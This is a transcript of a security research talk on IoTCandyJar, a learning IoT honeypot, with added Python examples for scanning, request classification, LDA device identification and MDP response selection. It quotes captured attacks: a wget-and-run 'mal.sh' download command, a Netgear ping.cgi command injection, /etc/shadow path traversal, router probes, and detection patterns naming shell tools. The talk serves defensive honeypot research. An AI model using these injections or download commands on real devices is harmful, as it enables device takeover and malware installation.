IoTCandyJar: Towards an Intelligent-Interaction Honeypot for IoT Devices
Transcript of the slide deck.
Page 1
IoTCandyJar: Towards an Intelligent-Interaction Honeypot for IoT Devices
Page 2
Bio
• Black Hat Veteran (2016 USA, 2017 Asia, 2017 USA).
• Virus Bulletin (2016, 2017).
• Principal Security Researcher @ PANW.
Mobile Security: Discover Malware; Android Security.
Web Security: Exploit Kit Detection; Browser Security.
Explore & Exploit: Fuzzing & CVEs; Attacks.
IoT Security: Vulnerability; SDN-based Solution.
Page 3
Agenda
• IoT Honeypot.
• Intelligent Interaction.
• IoT Scanner.
• IoT-ID.
• IoT Learner.
Page 4
IoT Honeypot
The idea of honeypots began in 1991.
Low-Interaction
• Very limited level of interaction.
• Manually generate responses.
• honeyd.
High-Interaction
• Fully fledged operating system.
• Interact with a real system (physical) or an emulator (virtual).
• Gen III.
Page 5
Challenges to Build an IoT Honeypot
Low-Interaction IoT Honeypot? Heterogeneity. Lack of emulator.
High-Interaction IoT Honeypot? Lack of knowledge. Expensive.
Page 6
Intelligent-Interaction
• Simulate behaviors.
• Automatically collect the IoT behaviors expected by attackers.
• Intelligently learn through interaction.
Page 7
Why Interaction?
The attacker first sends a pre-attack check, here a request for {ip}:443/img/favicon.png?v=6.0.1-1213, and reads the honeypot's reply.
• 404 Not Found: the check fails and the attack is never sent.
• 200 OK: the attack (CVE-2016-6433) follows, with request content wget http://x.x.x.x/mal.sh; chmod 777 mal.sh; sh mal.sh;
Only that second request reveals the malicious server address; a honeypot that answers the check wrongly never sees it.
Page 8
Captured Pre-Attack Checks
Replies the attacker distinguishes: 401 Unauthorized, 404 Not Found, 200 OK.
• HEAD / HTTP/1.1, expecting WWW-Authenticate: Basic realm="NETGEAR R7000"
• /globe (ZyXEL Modem)
• /etc/RT2870STA.dat (IP camera info/config)
• getstatus.cgi
• home_wan.htm
• …
Page 9
IoT Protocols
• Management Component Transport (MCTP): request REMOTEHI_SRDK_MEDIA_GetShowAttr MCTP/1.0, reply MCTP/1.0 200 OK (vulnerable Kguard DVR).
• HNAP: /HNAP1/ (vulnerable router: Netgear | Linksys).
• UDP port 53413: probe \x00\x00\x00\x00\x00\x00\x00\x00\xD0\xA5, answered with Login: (vulnerable router: Netcore | Netis).
Page 10
Echo Command
Inject an echo command that prints a random string and check for that string in the response (Netgear DGN2200v1-v4):
POST /ping.cgi HTTP/1.1
Referer: http://x.x.x.x/DIAG_diag.htm
IPAddr1=1&IPAddr2=2&IPAddr3=3&IPAddr4=4&ping=Ping&ping_IPAddr=12.12.12.12; echo "zP8ZDXwQCC";
Response contains: zP8ZDXwQCC
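The echo-nonce check above is how the scanner confirms that a command really executed instead of merely matching a signature. The Python below is an added example (not IoTCandyJar code): it builds the /ping.cgi form body with a fresh random marker and decides whether the marker came back as command output. The parameter names follow the slide; the sample responses are constructed. The caveat it handles is the one that bites in practice: a device that reflects the submitted form back (error page, hidden input, log view) contains the literal echo command without ever running it, so copies of the injected text in raw, URL-encoded and HTML-escaped form are discounted before the marker is searched for.

```python
import html
import secrets
import string
from urllib.parse import quote, quote_plus, urlencode

# Constructed form fields modelled on the page's /ping.cgi request; ping_IPAddr is the injection point.
BASE_FIELDS = {"IPAddr1": "1", "IPAddr2": "2", "IPAddr3": "3", "IPAddr4": "4", "ping": "Ping"}
NONCE = "zP8ZDXwQCC"  # the marker shown on the slide, reused for the constructed samples


def make_nonce(length=10):
    """Random alphanumeric marker that will not occur by chance in a real page."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def build_probe(nonce, target_ip="12.12.12.12"):
    """Form body for the probe: the echo of the nonce is appended to the ping target."""
    fields = dict(BASE_FIELDS, ping_IPAddr=f'{target_ip}; echo "{nonce}";')
    return urlencode(fields)


def confirms_execution(nonce, body):
    """True only if the nonce shows up as command output.

    Every literal copy of the injected command (raw, percent-encoded as a client
    would send it, or HTML-escaped as a form page would render it) is removed
    first; whatever nonce remains must have been printed by the shell.
    """
    injected = f'echo "{nonce}"'
    scrubbed = body
    for variant in (injected, quote(injected), quote_plus(injected), html.escape(injected)):
        scrubbed = scrubbed.replace(variant, "")
    return nonce in scrubbed


def classify_response(nonce, body):
    """'executed' (vulnerable), 'reflected' (input echoed back only) or 'absent'."""
    if confirms_execution(nonce, body):
        return "executed"
    return "reflected" if nonce in body else "absent"


# Constructed sample responses, not captured from a real device.
EXECUTED_BODY = (
    "<html><body><pre>\n"
    "PING 12.12.12.12 (12.12.12.12): 56 data bytes\n"
    "--- 12.12.12.12 ping statistics ---\n"
    "3 packets transmitted, 0 packets received, 100% packet loss\n"
    "zP8ZDXwQCC\n"
    "</pre></body></html>\n"
)
REFLECTED_BODY = (
    '<html><body><form action="/ping.cgi">\n'
    '<input name="ping_IPAddr" value="12.12.12.12; echo &quot;zP8ZDXwQCC&quot;;">\n'
    "</form></body></html>\n"
)
CLEAN_BODY = "<html><body>Ping: 12.12.12.12</body></html>"

if __name__ == "__main__":
    print(build_probe(NONCE))
    for name, body in (("executed", EXECUTED_BODY), ("reflected", REFLECTED_BODY), ("clean", CLEAN_BODY)):
        print(name, "->", classify_response(NONCE, body))
```

When the probe is actually sent, use a new `make_nonce()` per target so a cached or replayed page from an earlier probe cannot produce a false positive.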
Page 11
System Architecture
Components: Honeypot Instances, Session Table, IoT Database, Learning Model, IoT Scanner (Active Probing), Filter, IoT-ID, IoT Learner (MDP).
Data flow: (1) Raw_Request, (2) Filter, (3) Raw_Response.
Page 12
IoT Scanner
Automatic IoT Behaviors Collector.
Page 13
Customized Scanning for IoT Devices
• IP Filtering
• Port Filtering
• Request Filtering
• Exploit Filtering
Page 14
IP Address Filtering
MASSCAN
Page 15
Ports Filtering
Prioritize scanning traffic on these ports.
Page 16
Request Filtering
Captured Honeypot Traffic (Requests): 18M → 1M → 0.4M
Page 17
Request Type by Port
Page 18
Exploit Request Filtering
• Remote Command Execution (RCE): UPnP, TR-069 SOAP, encoded commands such as /shell?%75%6E%61%6D%65%20%2D%61 (decodes to uname -a).
• Info Disclosure: path traversal such as ../../../../etc/shadow; information leaking.
• Identify shellcode.
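Added example, not the project's filter: a small classifier over captured requests that applies the classes on this slide (RCE, SOAP-carried commands as in UPnP, TR-069 or HNAP traffic, path traversal, information disclosure). The sample captures are constructed to mirror the page's examples; the tag names, indicator regexes and the bounded repeated percent-decoding (so a double-encoded ../ cannot slip past a single decode) are my choices. A production filter uses a curated signature list instead of these few patterns.

```python
import re
from urllib.parse import unquote, urlsplit

# Indicator patterns (assumed); a production filter uses a curated signature list.
SHELL_META = re.compile(r"[;|`]|\$\(")
SHELL_CMDS = re.compile(r"\b(wget|curl|tftp|busybox|chmod|uname|telnetd|nc|sh)\b")
SENSITIVE_FILES = re.compile(r"/etc/(passwd|shadow)\b|\.dat\b")


def fully_decode(s, rounds=3):
    """Percent-decode until stable (bounded) so double encoding cannot hide a payload."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def escapes_root(path):
    """True if the '..' segments of a decoded path climb above the document root."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def parse_request(raw):
    """Split a CRLF-framed HTTP request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def classify_request(raw):
    """Tags for one captured request; an empty set means it is not an exploit attempt."""
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    path = fully_decode(url.path)
    params = [fully_decode(p) for p in (url.query + "&" + body).split("&") if p]
    soap = headers.get("soapaction", "")          # SOAP method is also a command-injection sink
    haystack = " ".join([path, *params, soap])
    tags = set()
    if fully_decode(target + body) != target + body:
        tags.add("encoded")
    if escapes_root(path):
        tags.add("path-traversal")
    if SENSITIVE_FILES.search(haystack):
        tags.add("info-disclosure")
    if SHELL_CMDS.search(haystack):
        tags.add("rce")
    if SHELL_META.search(" ".join([*params, soap])):
        tags.add("cmd-injection")
    if soap or "envelope" in body.lower():
        tags.add("soap")
    return tags


def filter_exploits(requests):
    """Keep only the requests worth replaying against real devices, with their tags."""
    return [(r.split("\r\n", 1)[0], classify_request(r)) for r in requests if classify_request(r)]


# Constructed captures modelled on the page's examples (not real honeypot traffic).
SAMPLES = [
    "GET /shell?%75%6E%61%6D%65%20%2D%61 HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n",
    "GET /cgi-bin/../../../../etc/shadow HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n",
    "GET /cgi-bin/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n",
    "POST /ping.cgi HTTP/1.1\r\nHost: 192.0.2.10\r\nReferer: http://192.0.2.10/DIAG_diag.htm\r\n\r\n"
    "IPAddr1=1&IPAddr2=2&IPAddr3=3&IPAddr4=4&ping=Ping&ping_IPAddr=12.12.12.12%3Bwget+http%3A%2F%2Fx.x.x.x%2Fmal.sh%3Bsh+mal.sh",
    'POST /HNAP1/ HTTP/1.1\r\nHost: 192.0.2.10\r\nSOAPAction: "GetDeviceSettings; wget http://x.x.x.x/mal.sh"\r\n\r\n'
    '<?xml version="1.0"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body/></soap:Envelope>',
    "GET /img/favicon.png?v=6.0.1-1213 HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n",
]

if __name__ == "__main__":
    for line, tags in filter_exploits(SAMPLES):
        print(f"{line:70s} {sorted(tags)}")
```

The favicon pre-attack check from page 7 gets no tag and is dropped; it still belongs in the request set that the scanner replays, just not in the exploit subset.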
Page 19
Scanning Result
• 300 threads.
• 3 sec timeout.
• Reuse TCP session.
Page 20
IoT-ID: Pinpoint IoT Device
Page 21
IoT-ID
• Problem: a pattern-match-based approach is not enough. Examples: conflicting results; IP change.
• Goal: obtain accurate knowledge of the IoT device; pinpoint it with IoT-ID.
• Approach: LDA-based solution.
Page 22
LDA-Based Solution
• LDA: documents, terms, topics. A document is a mixture of topics.
• Problem formulation: treat each response as a document and the type of the IoT device as the topic.
• Example: HTTP traffic from 6 different router vendors; summarize 15 different topics for them.
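An added, self-contained illustration of this formulation (not the IoT-ID implementation, which the slides do not show): each response is tokenized into a document, a small collapsed-Gibbs LDA is fitted over the corpus, each learned topic is labelled by majority vote with the vendor of the responses that land in it, and a new response is identified by folding it into the fitted model. The training responses, vendor names, token regex, stop list and hyperparameters are all assumed; a real deployment would use a library such as gensim or scikit-learn and far more data, and the topic count (15 on the slide for 6 vendors) is tuned rather than set to the number of vendors.

```python
import random
import re

TOKEN = re.compile(r"[A-Za-z][A-Za-z0-9_.-]{2,}")
GENERIC = {"http", "html", "head", "body", "title", "content-type", "text", "charset", "utf-8"}


def tokenize(response):
    """One captured HTTP response becomes one bag-of-terms document."""
    return [t.lower() for t in TOKEN.findall(response) if t.lower() not in GENERIC]


class CollapsedGibbsLDA:
    """Minimal LDA (collapsed Gibbs sampling); adequate for a few hundred short responses."""

    def __init__(self, n_topics, alpha=0.1, beta=0.01, iters=200, seed=7):
        self.K, self.alpha, self.beta, self.iters = n_topics, alpha, beta, iters
        self.rng = random.Random(seed)

    def _sample(self, nd, wi):
        # P(z = k | rest) is proportional to (n_dk + alpha) * (n_kw + beta) / (n_k + V * beta)
        V = len(self.vocab)
        w = [(nd[k] + self.alpha) * (self.nkw[k][wi] + self.beta) / (self.nk[k] + V * self.beta)
             for k in range(self.K)]
        return self.rng.choices(range(self.K), weights=w)[0]

    def _bump(self, nd, k, wi, delta):
        nd[k] += delta
        self.nkw[k][wi] += delta
        self.nk[k] += delta

    def _dist(self, counts):
        s = [c + self.alpha for c in counts]
        return [x / sum(s) for x in s]

    def fit(self, docs):
        self.vocab = sorted({t for d in docs for t in d})
        self.w2i = {w: i for i, w in enumerate(self.vocab)}
        ids = [[self.w2i[t] for t in d] for d in docs]
        self.nkw = [[0] * len(self.vocab) for _ in range(self.K)]  # topic-term counts
        self.nk = [0] * self.K                                       # tokens per topic
        ndk = [[0] * self.K for _ in docs]                           # doc-topic counts
        z = [[self.rng.randrange(self.K) for _ in d] for d in ids]
        for d, doc in enumerate(ids):
            for n, wi in enumerate(doc):
                self._bump(ndk[d], z[d][n], wi, +1)
        for _ in range(self.iters):
            for d, doc in enumerate(ids):
                for n, wi in enumerate(doc):
                    self._bump(ndk[d], z[d][n], wi, -1)
                    z[d][n] = self._sample(ndk[d], wi)
                    self._bump(ndk[d], z[d][n], wi, +1)
        self.doc_topics = [self._dist(row) for row in ndk]
        return self

    def infer(self, doc, iters=50):
        """Fold one new response in with topic-term counts frozen; returns its topic mixture."""
        ids = [self.w2i[t] for t in doc if t in self.w2i]
        nd, z = [0] * self.K, [self.rng.randrange(self.K) for _ in ids]
        for k in z:
            nd[k] += 1
        for _ in range(iters):
            for n, wi in enumerate(ids):
                nd[z[n]] -= 1
                z[n] = self._sample(nd, wi)
                nd[z[n]] += 1
        return self._dist(nd)

    def top_terms(self, k, n=5):
        return [self.vocab[i] for i in sorted(range(len(self.vocab)), key=lambda i: -self.nkw[k][i])[:n]]


# Constructed responses for three made-up models (not real device output).
TRAINING = {
    "brand-a": ['HTTP/1.1 401 Unauthorized\r\nWWW-Authenticate: Basic realm="BrandA AX1000"\r\nServer: ahttpd/1.0',
                'HTTP/1.1 200 OK\r\nServer: ahttpd/1.0\r\n\r\n<title>BrandA AX1000 Setup</title><a href="home_wan.htm">'],
    "brand-b": ['HTTP/1.1 200 OK\r\nServer: bhttpd\r\n\r\n<ModelName>BX-200</ModelName><FirmwareVersion>2.1</FirmwareVersion>',
                'HTTP/1.1 401 Unauthorized\r\nServer: bhttpd\r\nWWW-Authenticate: Basic realm="BX-200 Router"'],
    "brand-c": ['HTTP/1.1 200 OK\r\nServer: chttpd\r\n\r\n<title>CamView C9</title><script src="camview.js">',
                'HTTP/1.1 404 Not Found\r\nServer: chttpd\r\n\r\nCamView C9: getstatus.cgi not found'],
}


def build_identifier(training, n_topics=3):
    docs, labels = [], []
    for vendor, responses in training.items():
        docs.extend(tokenize(r) for r in responses)
        labels.extend(vendor for _ in responses)
    model = CollapsedGibbsLDA(n_topics).fit(docs)
    votes = [{} for _ in range(n_topics)]  # majority vote: which vendor dominates each topic
    for dist, vendor in zip(model.doc_topics, labels):
        k = max(range(n_topics), key=dist.__getitem__)
        votes[k][vendor] = votes[k].get(vendor, 0) + 1
    return model, [max(v, key=v.get) if v else None for v in votes]


def identify(model, topic_vendor, response):
    """Pinpoint a device from one response: strongest labelled topic of its inferred mixture."""
    dist = model.infer(tokenize(response))
    k = max((j for j in range(model.K) if topic_vendor[j]), key=dist.__getitem__)
    return topic_vendor[k], dist[k]
```

Because the sampler is seeded, the run is reproducible; with real data, check the top terms of each topic (`top_terms`) before trusting the vendor labels, since a topic that captures generic header vocabulary rather than model-specific strings will vote for whichever vendor happens to dominate the corpus.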
Page 24
IoT Learner
Learning behaviors from interactions.
Page 25
IoT Learner components: State Locator, Selector (Model + Algorithm), Select Resp, Session Table, Req_Rsp Mapping. Raw Request comes in, Raw Response goes out, and the outcome is fed back into the model.
Page 26
Random Responding
Scanning result for URL /HNAP1/ (knowledge database):
• 404 Not Found (SonicWALL FW)
• 401 Unauthorized (TRENDnet router)
• <ModelName>WRT110</ModelName> (Linksys)
• <ModelName>DIR-615B2</ModelName> (D-Link)
On an incoming /HNAP1/ request, randomly select one, reply, and record <Req, Rsp, IP, Port, Proto> in the session table. Accumulate behavior knowledge from the attacker's reaction (the following request).
Page 27
Problem Formulation
• Decision epochs (t), states (x, s), actions (a), transition probabilities (T), rewards (r).
• When we receive a request: current incoming request, potential response set, Pr(next request), capture malicious payload.
• Sequential decision making: select the best response as the action to satisfy attackers and capture the malicious payload.
Page 28
MDP Build
Scanning responses for /HNAP1/: RSP1 = 404 Not Found (SonicWALL FW); RSP2 = 401 Unauthorized (TRENDnet); RSP3 = <ModelName>WRT110</ModelName> (Linksys); RSP4 = <ModelName>DIR-615B2</ModelName> (D-Link).
Session table:
Req_ID Rsp_ID Session_ID
0 1 0
0 2 1
0 2 2
0 2 2
0 3 3
1 0 3
… … …
Transition diagram: states /HNAP1/, /ping.cgi shellcmd, SOAPAction: GetDeviceSettings shellcmd, and Terminated; edges are labelled with the chosen response (RSP1 to RSP4) and its estimated probability (RSP2 splits 0.9/0.1, RSP3 splits 0.8/0.2, RSP1 and RSP4 have probability 1).
Page 29
• The real case is more complex: CGI scripts, entry points.
• Privileged CGI: medium reward. Exploit request: high reward.
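The session table on page 28 and the reward tiers on this page and page 33 are enough to show the whole loop in code. What follows is an added Python example, not IoTCandyJar's own learner: it estimates transition probabilities from a constructed session table, runs Bellman backups to value each request state, selects the response with the highest expected reward for the pages' /HNAP1/ case, and values the random-response baseline of page 26 on the same model for comparison. Reward values follow the page (+10 for an exploit request, +2 for a privileged CGI); treating a captured exploit request as absorbing, charging -10 when a session ends without an attack, the request and response catalogues and the discount factor are my assumptions.

```python
import random
from collections import defaultdict

GAMMA = 0.9                    # discount on rewards from later requests (assumed)
TERMINATED = "TERMINATED"

# Constructed catalogue modelled on the page's /HNAP1/ example (RSP1..RSP4 as on the slide).
REQUESTS = {0: "/HNAP1/", 1: "/login.cgi", 2: "/apply.cgi shell", 3: "/ping.cgi shellcmd"}
RESPONSES = {1: "404 Not Found (SonicWALL FW)", 2: "401 Unauthorized (TRENDnet)",
             3: "<ModelName>WRT110</ModelName> (Linksys)", 4: "<ModelName>DIR-615B2</ModelName> (D-Link)",
             5: "200 OK login page", 6: "302 Found"}
# Reward earned when the attacker's *next* request arrives: exploit +10, privileged CGI +2 (page);
# -10 for a session that ends without an attack is assumed from the unlabelled -10 on page 33.
REWARD = {0: 0.0, 1: 2.0, 2: 10.0, 3: 10.0, TERMINATED: -10.0}
GOAL = {2, 3}                  # exploit requests: payload captured, treated as absorbing (assumption)

# Constructed session table rows (Req_ID, Rsp_ID, Session_ID); rsp 0 = reply to a captured exploit.
SESSION_TABLE = [
    (0, 1, 0),
    (0, 2, 1), (3, 0, 1),
    (0, 2, 2), (3, 0, 2),
    (0, 2, 3),
    (0, 3, 4), (1, 5, 4), (2, 0, 4),
    (0, 3, 5), (1, 5, 5),
    (0, 3, 6), (1, 6, 6),
    (0, 3, 7), (1, 5, 7), (2, 0, 7),
    (0, 4, 8),
    (0, 1, 9),
]


def build_mdp(rows):
    """Empirical transition model T[(req, rsp)] = {next_req: probability} from the session table."""
    sessions = defaultdict(list)
    for req, rsp, sid in rows:
        sessions[sid].append((req, rsp))
    counts = defaultdict(lambda: defaultdict(int))
    for steps in sessions.values():
        for i, (req, rsp) in enumerate(steps):
            if req in GOAL:
                break                                   # captured: nothing further to decide
            nxt = steps[i + 1][0] if i + 1 < len(steps) else TERMINATED
            counts[(req, rsp)][nxt] += 1
    return {sa: {n: c / sum(nxts.values()) for n, c in nxts.items()} for sa, nxts in counts.items()}


def actions(T, req):
    """Responses that have been tried for this request."""
    return sorted(rsp for (r, rsp) in T if r == req)


def q_value(T, V, req, rsp):
    """Expected reward of answering req with rsp: reward of the next request plus discounted value."""
    return sum(p * (REWARD[n] + GAMMA * V.get(n, 0.0)) for n, p in T[(req, rsp)].items())


def mean(xs):
    return sum(xs) / len(xs)


def evaluate(T, combine, sweeps=100):
    """Bellman backups over request states: combine=max gives the optimal values,
    combine=mean the value of picking a response uniformly at random (page 26 baseline)."""
    states = {r for (r, _) in T}
    V = {s: 0.0 for s in states}
    for _ in range(sweeps):
        for s in states:
            V[s] = combine([q_value(T, V, s, a) for a in actions(T, s)])
    return V


def select_response(T, V, req, rng=None, epsilon=0.0):
    """MDP selector: the response with the highest Q; with epsilon > 0 it occasionally
    explores another response so rarely tried answers still collect feedback."""
    acts = actions(T, req)
    if rng is not None and rng.random() < epsilon:
        return rng.choice(acts)
    return max(acts, key=lambda a: q_value(T, V, req, a))


if __name__ == "__main__":
    T = build_mdp(SESSION_TABLE)
    V_mdp, V_rand = evaluate(T, max), evaluate(T, mean)
    for req in sorted({r for (r, _) in T}):
        best = select_response(T, V_mdp, req)
        print(f"{REQUESTS[req]:12s} -> RSP{best} {RESPONSES[best]}; V_mdp={V_mdp[req]:.2f} V_random={V_rand[req]:.2f}")
```

On this data the selector prefers RSP3 (the Linksys-style body) for /HNAP1/ even though RSP2 leads to an exploit more often in one step, because the login-page path it opens is worth more once the discounted follow-up is counted; that is the sequential part of the formulation. The model is rebuilt from the session table after each session, so the probabilities move as attackers react, which is the feedback arrow on page 25.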
Page 30
Session Improvement
• Random response selection algorithm: occasionally selects the correct one.
• MDP response selection algorithm: selects the correct one with higher probability.
Page 31
Three Takeaways
• Challenges to build an IoT honeypot using traditional ways.
• Utilizing an automatic and intelligent way to build an IoT honeypot.
• Interesting pre-attack checks and exploitations on IoT devices.
Page 32
Q&A
Page 33
Reward example (backup slide)
Pre-attack check /img/favicon.png?v=6.0.1-1213: 200 OK keeps the session alive; 404 leads to Terminated.
Request /: 302 Doc moved; page containing var password="…".
Exploit requests: /apply.cgi shell +10; /rulesimport.cgi shell +10.
Privileged CGI: /login.cgi +2 (Username: xx Password: xx); /view.cgi +2.
/loginpserr.stm +1.
Other reward values in the diagram: +0.5, -5, -10.
Page 34 (backup slide repeating the MDP Build session table and transition diagram from page 28)